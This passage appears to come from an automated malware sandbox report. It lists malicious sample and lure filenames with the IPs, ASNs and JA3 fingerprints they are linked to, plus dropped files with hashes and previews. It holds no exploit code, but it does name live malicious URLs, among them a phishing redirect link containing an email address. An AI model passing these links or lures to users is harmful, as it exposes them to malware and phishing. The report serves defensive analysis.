                                                                                                                                                                                    89BR0suQeS.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    RBBD5vivZc.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    S01NwVhW5A.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    qelMUH5CPF.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    o9Fr4K1qcu.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                                    SecuriteInfo.com.Trojan.Siggen10.63473.17852.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    IMG_P_O_RFQ-WSB_17025-ENd User-Evaluate.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    GuYXnzIH45.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    tinyurl.comSIN029088.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.139.65
                                                                                                                                                                                    SIN029088.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    https://tinyurl.com/y5tjuap2Get hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    https://tinyurl.com/y5tjuap2Get hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.139.65
                                                                                                                                                                                    http://tinyurl.comGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.139.65
                                                                                                                                                                                    viaseating-666114_xls.HtMlGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    https://tinyurl.com/venmosuppGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    WayBill Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.1.225
                                                                                                                                                                                    WayBill Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.139.65
                                                                                                                                                                                    WayBill Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.139.65
                                                                                                                                                                                    tetratech-907745_xls.HtMlGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    Waybill Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    Waybill Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.1.225
                                                                                                                                                                                    Waybill Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    rooney-eng-598583_xls.HtMlGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.139.65
                                                                                                                                                                                    Overdue Payments.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.1.225
                                                                                                                                                                                    Overdue Payments.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    New PO 9380.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.139.65

                                                                                                                                                                                    ASN

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    CLOUDFLARENETUShttps://akljsdhfas.selz.com/?Get hashmaliciousBrowse
                                                                                                                                                                                    • 104.18.108.36
                                                                                                                                                                                    quotation_0087210_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.188.154
                                                                                                                                                                                    Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.24.105.107
                                                                                                                                                                                    1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    INQUIRY.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.152.230
                                                                                                                                                                                    PO Quotation.jarGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.22.46
                                                                                                                                                                                    doc2227740.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.172.15
                                                                                                                                                                                    PO Quotation.jarGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.23.46
                                                                                                                                                                                    doc2227740.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.173.15
                                                                                                                                                                                    TRIAL-ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.18.57.249
                                                                                                                                                                                    d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.173.15
                                                                                                                                                                                    23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.23.99.190
                                                                                                                                                                                    d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.173.15
                                                                                                                                                                                    PO #5618896.gz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.23.98.190
                                                                                                                                                                                    PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    07DYwxlVm4.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.133.115
                                                                                                                                                                                    9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.133.115
                                                                                                                                                                                    af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.133.115
                                                                                                                                                                                    https://www.vedansha.com/doc/office/LatestLOGOOfficeEncoded/LatestLOGOOfficeEncoded/RedirectPage/marc.loney@navitas.comGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.38.66
                                                                                                                                                                                    CLOUDFLARENETUShttps://akljsdhfas.selz.com/?Get hashmaliciousBrowse
                                                                                                                                                                                    • 104.18.108.36
                                                                                                                                                                                    quotation_0087210_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.188.154
                                                                                                                                                                                    Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.24.105.107
                                                                                                                                                                                    1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    INQUIRY.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.152.230
                                                                                                                                                                                    PO Quotation.jarGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.22.46
                                                                                                                                                                                    doc2227740.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.172.15
                                                                                                                                                                                    PO Quotation.jarGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.20.23.46
                                                                                                                                                                                    doc2227740.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.173.15
                                                                                                                                                                                    TRIAL-ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.18.57.249
                                                                                                                                                                                    d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.173.15
                                                                                                                                                                                    23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.23.99.190
                                                                                                                                                                                    d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.173.15
                                                                                                                                                                                    PO #5618896.gz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.23.98.190
                                                                                                                                                                                    PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    07DYwxlVm4.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.133.115
                                                                                                                                                                                    9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.133.115
                                                                                                                                                                                    af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.27.133.115
                                                                                                                                                                                    https://www.vedansha.com/doc/office/LatestLOGOOfficeEncoded/LatestLOGOOfficeEncoded/RedirectPage/marc.loney@navitas.comGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.38.66

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adquotation_0087210_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    PO #5618896.gz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    bGtm3bQKUj.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    https://greatdownloadplace.net/estate/formated/xlsc/Setup_v177.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    BlueJeansInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    JmuEmJ4T4r5bc8S.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    List Of Orders.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    Status____201711.gz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    Documento relativo al carico e alla spedizione del cliente_italy2020.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    b095b966805abb7df4ffddf183def880.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    SIN029088.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    Request for Quote_PDF.vbsGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    01_file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    aguhvLvn.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    BlueJeans.2.25.11u.msiGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    2B027105A0C3.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65
                                                                                                                                                                                    SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    • 104.20.138.65

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\powershell.exedocCGLRRT67L45F205V.vbsGet hashmaliciousBrowse
                                                                                                                                                                                      docBRTNMR51L69G006Q.vbsGet hashmaliciousBrowse
                                                                                                                                                                                        Allegato_doc_03141330161.vbsGet hashmaliciousBrowse
                                                                                                                                                                                          Allegato_doc_04198100168.vbsGet hashmaliciousBrowse
                                                                                                                                                                                            Allegato_doc_03675480267.vbsGet hashmaliciousBrowse
                                                                                                                                                                                              Allegato_doc_02044200042.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                Allegato_doc_TMSRLL61M43B796B.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                  Allegato_doc_BRNLSN65H44H501N.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                    Allegato_doc_03587420286.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                      Allegato_doc_03455910780.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                        Allegato_doc_01555200441.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                          Allegato_doc_07501560150.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                            Allegato_doc_01578300210.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                              sload.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                sload (2).vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  Allegato_doc_02298410644.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                    Allegato.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                      Fatt_cliente_02567110412.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                        FattDiffEmessa2020 VNZMSM75H27B201Q.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                          FattDiffEmessa2020 01170200339.vbsGet hashmaliciousBrowse

                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\o.exe.log
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1837
                                                                                                                                                                                                                            Entropy (8bit):5.313122446763076
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:MgzeyHKXwYHKhQnoRAHKzvUHKLHAHbHKntHoxHw0vmHKoOXIHj:lrqXwYqhQnouqzsqLg7qntIxHwzqo0ID
                                                                                                                                                                                                                            MD5:5E7F085B0ABD64EE705C194B20076820
                                                                                                                                                                                                                            SHA1:F01F15FFF585A2EE10EF3992C919E8E210BB4FB9
                                                                                                                                                                                                                            SHA-256:04C946A4CC944EBB26734C936D62F3F073D5BB8F3AC748BDBE7C8C42BAD00DCB
                                                                                                                                                                                                                            SHA-512:35E701CA2289813FA3F0971C6701A3CDB5C4D4B56724439288CDB6B4BD95613D92E9D4393144077A930E57D7D1D65D9D86E92884F3030F4DF4CC95BBEB84C60E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..2,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\32F10499-3ABF-4CE4-A624-F22D1B8584B0
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):129952
                                                                                                                                                                                                                            Entropy (8bit):5.378343270999592
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:OcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:MmQ9DQW+zBX8u
                                                                                                                                                                                                                            MD5:D6E83EE170442AF09B8BCF073B59768C
                                                                                                                                                                                                                            SHA1:5949B8723FE09F95EDCAF2C21BF3C5E607FC5B00
                                                                                                                                                                                                                            SHA-256:A78BA071721C5ED90A800C7A60B917AAE4BCEB9E5048296C22554DAFE2EF5166
                                                                                                                                                                                                                            SHA-512:81105DAF2AEB829E768161AA1111F141A3AC69345A0A56C72B153C602876E17E0F49B2DC996C66730DC97F3CB068496B8A9987B6D09DA0C09021038D072D0EE3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T08:31:44">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5829
                                                                                                                                                                                                                            Entropy (8bit):4.8968676994158
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                                                                                                                                                            MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                                                                                                                                                            SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                                                                                                                                                            SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                                                                                                                                                            SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):17684
                                                                                                                                                                                                                            Entropy (8bit):5.572233031830033
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:FtpLGhiwzVA3uh+G127iSBKn+ulUIJ8p7Y9RSJAfXPJWvuYA:khFoG1n4K+ulUo8A/ZAA
                                                                                                                                                                                                                            MD5:663FBB7E72638843A4084DECF1FF8DEA
                                                                                                                                                                                                                            SHA1:743ADF7BA2F51A3F4EEB48760E05DB93A42ACDFF
                                                                                                                                                                                                                            SHA-256:03DE18D2162D09710E0A765AF514C4C3CBB9F02CB35E5F0CB744FD247FA9170A
                                                                                                                                                                                                                            SHA-512:55FCCD03EBB1484A853E68266983BAC970FCA50DE89F0C3CFCAD2366980DBBE5E893CE9CA0B34B589AB2E8A822FAD388B93C836B1332D782BCFBC41778186326
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: @...e.........................|.$..._.....P..........@..........H...............<@.^.L."My...:+..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\C0B10000
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):52851
                                                                                                                                                                                                                            Entropy (8bit):7.845722573410374
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:reG8o8mWXbkLwgwE73DFK5Rhdv1nhQgcJPkrTZNpT:aGD8mSb4wjE7zF0Rhdv1hQzMrT3pT
                                                                                                                                                                                                                            MD5:1722CBFD72DDAE45F1EF1448D60C37B2
                                                                                                                                                                                                                            SHA1:1F8A30FAF59BB3918BB0632917F5F5275F482A00
                                                                                                                                                                                                                            SHA-256:2713AEF6FA568DBC80C3287AC933518A21B0DE1FE83805BA860764EA2D001C41
                                                                                                                                                                                                                            SHA-512:A3683CFD468B3B34D0417F12036608A8A163C123266FB0741664E9D97499C3F6B2979220B135F5B3CABE8FEE73246FAFE7A01EE9632E3F922EBDB9155E557702
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: ...N.0.E.H.C.-J.@.5e.e.H.......<ni..q..@}El"...3s3....b...w5.V.V..^i7....Sy..L.)a...m.....b.....E;.Y.R...e.V`..8:..hE..8.A......n....Ke..l<z..X.TL...d..+...eT.D.FK.(Q.r.........\Z..0D....dM..&b|...0d|/3.....9.?"..~iv>T.....xEf. ..>tq/...VP.....%....O..S...q.l.....L.:VY!..815@gB........P..i..>....r....hg.~...v...#Q..o...{<.V........k.j..'.*..|ux......1..............@B....m...;"M....y.)P{..../.......PK..........!.R...............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.....
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0gfm4ej.1n3.ps1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avhrq2qg.rzu.psm1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npjvw0rs.zxi.psm1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppytkpfp.dtr.psm1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shtfsvhw.opz.ps1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
